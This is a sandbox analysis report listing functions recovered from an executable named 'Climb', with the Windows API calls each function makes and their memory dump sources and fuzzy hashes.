                                                                                                                                                                      • Instruction ID: 41c2358ef70fd0d1e1e459d86ac9ed959993f3dc7727994a316e5bf4c018c6f4
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e4432cc5ac328619a44b8c484359522a8df72df0732c2cf1931d161d413ae98
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F5159B5A00219EFCB10CF58C894EAABBF9FF88310B15855AED09DB310E774E915CB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005695F3
                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0056961F
                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00569677
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0056969C
                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005696A4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2832842796-0
                                                                                                                                                                      • Opcode ID: 037b5f2a2c0a5b5dbb4e7f7ec59af1c047bc5fedd9c2d64274749bc74cef3426
                                                                                                                                                                      • Instruction ID: 2b7c34004734f6a0f1f38576a596cfaeb26e15431b38d4b1173a48315daee0fa
                                                                                                                                                                      • Opcode Fuzzy Hash: 037b5f2a2c0a5b5dbb4e7f7ec59af1c047bc5fedd9c2d64274749bc74cef3426
                                                                                                                                                                      • Instruction Fuzzy Hash: 80514E35A00219AFDF05DF55C881E69BBF5FF49318F048059E94AAB3A2CB35ED41CB94
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0057999D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00579A2D
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00579A49
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00579A8F
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00579AAF
                                                                                                                                                                        • Part of subcall function 0050F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00561A02,?,7529E610), ref: 0050F9F1
                                                                                                                                                                        • Part of subcall function 0050F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00550354,00000000,00000000,?,?,00561A02,?,7529E610,?,00550354), ref: 0050FA18
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 666041331-0
                                                                                                                                                                      • Opcode ID: 708fbc93cc57c25074a96505ac5d393c432e771e2f5110bf370aac451a651072
                                                                                                                                                                      • Instruction ID: 532b94caec8e602df5c4e2bc8e26037263717ad999f950c1de1d13539576a14a
                                                                                                                                                                      • Opcode Fuzzy Hash: 708fbc93cc57c25074a96505ac5d393c432e771e2f5110bf370aac451a651072
                                                                                                                                                                      • Instruction Fuzzy Hash: 62513A35601209DFCB01DF69C485CADBBF0FF09314B1481A9E90AAB762D731ED86DBA1
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0058766B
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EC,?), ref: 00587682
                                                                                                                                                                      • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 005876AB
                                                                                                                                                                      • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0056B5BE,00000000,00000000), ref: 005876D0
                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 005876FF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Long$MessageSendShow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3688381893-0
                                                                                                                                                                      • Opcode ID: efacfce2fad43141e7823e99cf592ad3695f5355440df1cbada0e80b4b3add96
                                                                                                                                                                      • Instruction ID: 8bb0efadf0418fa7eb669029f252bf8127d66757a6a1bfeffdb5e6871a21dd92
                                                                                                                                                                      • Opcode Fuzzy Hash: efacfce2fad43141e7823e99cf592ad3695f5355440df1cbada0e80b4b3add96
                                                                                                                                                                      • Instruction Fuzzy Hash: 27419D35A08508AFD725AB6DC848FA57FA5FB09360F250264EC19B72E0E770ED50DB50
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                      • Opcode ID: b3c32ea7aa235c9ede97244fdf7406c6c6b602ae126d66bc0c5710bf7d5f44aa
                                                                                                                                                                      • Instruction ID: 9278338d68f4606730a99efd585dcb908b577fe42163f1f83290b5b8e0bdc3c1
                                                                                                                                                                      • Opcode Fuzzy Hash: b3c32ea7aa235c9ede97244fdf7406c6c6b602ae126d66bc0c5710bf7d5f44aa
                                                                                                                                                                      • Instruction Fuzzy Hash: BE41E436A00210AFDB24EF78D884A5DBBF1FF8A314F154569E515EB391EB31AD42CB80
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00552262
                                                                                                                                                                      • PostMessageW.USER32(00000001,00000201,00000001), ref: 0055230E
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?), ref: 00552316
                                                                                                                                                                      • PostMessageW.USER32(00000001,00000202,00000000), ref: 00552327
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0055232F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3382505437-0
                                                                                                                                                                      • Opcode ID: 2878a0c8f54b51328e27598a26cf6dd5c3d7ce808132b1718ce307983e3f7c87
                                                                                                                                                                      • Instruction ID: 1c4ef27e5f45976b09e2c2df0305b97622c54c946c021a327386cbefc1c2052e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2878a0c8f54b51328e27598a26cf6dd5c3d7ce808132b1718ce307983e3f7c87
                                                                                                                                                                      • Instruction Fuzzy Hash: D231D175900219EFDB00CFA8CD88ADE3BB5FB15316F004626FD25AB2D0C370A948DBA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0056CC63,00000000), ref: 0056D97D
                                                                                                                                                                      • InternetReadFile.WININET(?,00000000,?,?), ref: 0056D9B4
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,?,?,?,0056CC63,00000000), ref: 0056D9F9
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0056CC63,00000000), ref: 0056DA0D
                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000,?,?,?,0056CC63,00000000), ref: 0056DA37
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3191363074-0
                                                                                                                                                                      • Opcode ID: 25bc25fc86b3be2d6668fb552d24b8b99f8ae535005e1b5e84173e02606aef98
                                                                                                                                                                      • Instruction ID: 60e6f9472e71d8786332a445aa9ff64dd90876979381d2b9dd22d9667545cab2
                                                                                                                                                                      • Opcode Fuzzy Hash: 25bc25fc86b3be2d6668fb552d24b8b99f8ae535005e1b5e84173e02606aef98
                                                                                                                                                                      • Instruction Fuzzy Hash: 19314C71A04209EFDB20DFA5D884EAABBF8FF14354B10482EE546E7150D730AE44DB70
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 005861E4
                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0058623C
                                                                                                                                                                      • _wcslen.LIBCMT ref: 0058624E
                                                                                                                                                                      • _wcslen.LIBCMT ref: 00586259
                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 005862B5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 763830540-0
                                                                                                                                                                      • Opcode ID: 8544cf91239fb21d27b7b400a9999f23ac9f892c33cd0a71bb163d42a45a1151
                                                                                                                                                                      • Instruction ID: 416f59ee073e938f296cf1f8dd3517f8ac95481dd2d9f60e6e3764db8f0b5b87
                                                                                                                                                                      • Opcode Fuzzy Hash: 8544cf91239fb21d27b7b400a9999f23ac9f892c33cd0a71bb163d42a45a1151
                                                                                                                                                                      • Instruction Fuzzy Hash: AF218F759002189AEB10AFA4CC88AEE7FB9FB44324F104656FE25FA180EB709985CF50
                                                                                                                                                                      APIs
                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 005713AE
                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 005713C5
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00571401
                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 0057140D
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00571445
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4156661090-0
                                                                                                                                                                      • Opcode ID: 848f5348245fc29bbaf77dff4340b4cb6bb384298738157801bae2f5cf08350a
                                                                                                                                                                      • Instruction ID: e54e68dbc4cae1d0935fdd2ee48574d3c9869fb1675b9a05e4b65045f5011b33
                                                                                                                                                                      • Opcode Fuzzy Hash: 848f5348245fc29bbaf77dff4340b4cb6bb384298738157801bae2f5cf08350a
                                                                                                                                                                      • Instruction Fuzzy Hash: 99218435600608AFD704DF65DC88E6EBBF5FF54300B148429E84AE7791DB70AD04DB90
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 0052D146
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0052D169
                                                                                                                                                                        • Part of subcall function 00523B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00516A79,?,0000015D,?,?,?,?,005185B0,000000FF,00000000,?,?), ref: 00523BC5
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0052D18F
                                                                                                                                                                      • _free.LIBCMT ref: 0052D1A2
                                                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0052D1B1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 336800556-0
                                                                                                                                                                      • Opcode ID: c6d1ddc91e4748c214983c07562fc84668ea635f6320114c4c2e6469b4d3a3e2
                                                                                                                                                                      • Instruction ID: fbcd0de7b06d4c0947cf4f01208e94eeca3a6b6d4bc18dbefdddc620ccc9963c
                                                                                                                                                                      • Opcode Fuzzy Hash: c6d1ddc91e4748c214983c07562fc84668ea635f6320114c4c2e6469b4d3a3e2
                                                                                                                                                                      • Instruction Fuzzy Hash: F001B1766057357F63212A666C8CC7B6EBDFEC3B613140129BC04D26C0DA648C11D2B0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetLastError.KERNEL32(0000000A,?,?,0051F64E,0051545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00523170
                                                                                                                                                                      • _free.LIBCMT ref: 005231A5
                                                                                                                                                                      • _free.LIBCMT ref: 005231CC
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005231D9
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 005231E2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$_free
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3170660625-0
                                                                                                                                                                      • Opcode ID: a2612529f07d74123ab721a71e53d5996dbd799764fe7a4e0f592caaacff3617
                                                                                                                                                                      • Instruction ID: 5a722e57d26cad2fb920985bd980ef3d323e0ce7eaf73ddba6f406284f4314c4
                                                                                                                                                                      • Opcode Fuzzy Hash: a2612529f07d74123ab721a71e53d5996dbd799764fe7a4e0f592caaacff3617
                                                                                                                                                                      • Instruction Fuzzy Hash: 1E01F976640A313BD7162734BC8AE2B1F6DBFD33717200938FC15A21D1EE298A1AD521
                                                                                                                                                                      APIs
                                                                                                                                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?,?,00550C4E), ref: 0055091B
                                                                                                                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550936
                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550944
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?), ref: 00550954
                                                                                                                                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00550831,80070057,?,?), ref: 00550960
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3897988419-0
                                                                                                                                                                      • Opcode ID: c5a6baafd70be2f904ebed392e0a8d5ca401e071f06300ed790c5e5342689e13
                                                                                                                                                                      • Instruction ID: b301cc956e180273c5323af8ded3a86bd7defab6672f8c2920da7dcbd3524387
                                                                                                                                                                      • Opcode Fuzzy Hash: c5a6baafd70be2f904ebed392e0a8d5ca401e071f06300ed790c5e5342689e13
                                                                                                                                                                      • Instruction Fuzzy Hash: B3015672600205AFEB104F55DC44AAA7FFDEB847A2F142125BD05E3296E771DD48ABA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0055F2AE
                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 0055F2BC
                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 0055F2C4
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 0055F2CE
                                                                                                                                                                      • Sleep.KERNEL32 ref: 0055F30A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2833360925-0
                                                                                                                                                                      • Opcode ID: 8954d726f03abc78d7b46274baba7d27979b84c3616cae3c237407fae57f3c60
                                                                                                                                                                      • Instruction ID: ed420085cb32df16d05df03526d606c31122112e2f3110bfd40b93b6255c8563
                                                                                                                                                                      • Opcode Fuzzy Hash: 8954d726f03abc78d7b46274baba7d27979b84c3616cae3c237407fae57f3c60
                                                                                                                                                                      • Instruction Fuzzy Hash: 86015B75C01519DBDF00AFA4DC5DAEEBBB9BF18702F010866D941B2290DB309558D7A1
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00551A60
                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A6C
                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A7B
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005514E7,?,?,?), ref: 00551A82
                                                                                                                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00551A99
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true
                                                                                                                                                                      • Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 842720411-0
                                                                                                                                                                      • Opcode ID: 9f38bd1697b25a4e55efabaa2b62725cb2101b84ed6fae2448dc20799e0ca0a7
                                                                                                                                                                      • Instruction ID: fdbb193271a97464d9ea74188ae1dd3c1354d1220584f98d0c4e078c07709b3b
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f38bd1697b25a4e55efabaa2b62725cb2101b84ed6fae2448dc20799e0ca0a7
                                                                                                                                                                      • Instruction Fuzzy Hash: D90146B9601605BFDB124FA5DC48E6A3FBAEF882A5B210415FC45E22A0DA31DC449B70
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00551976
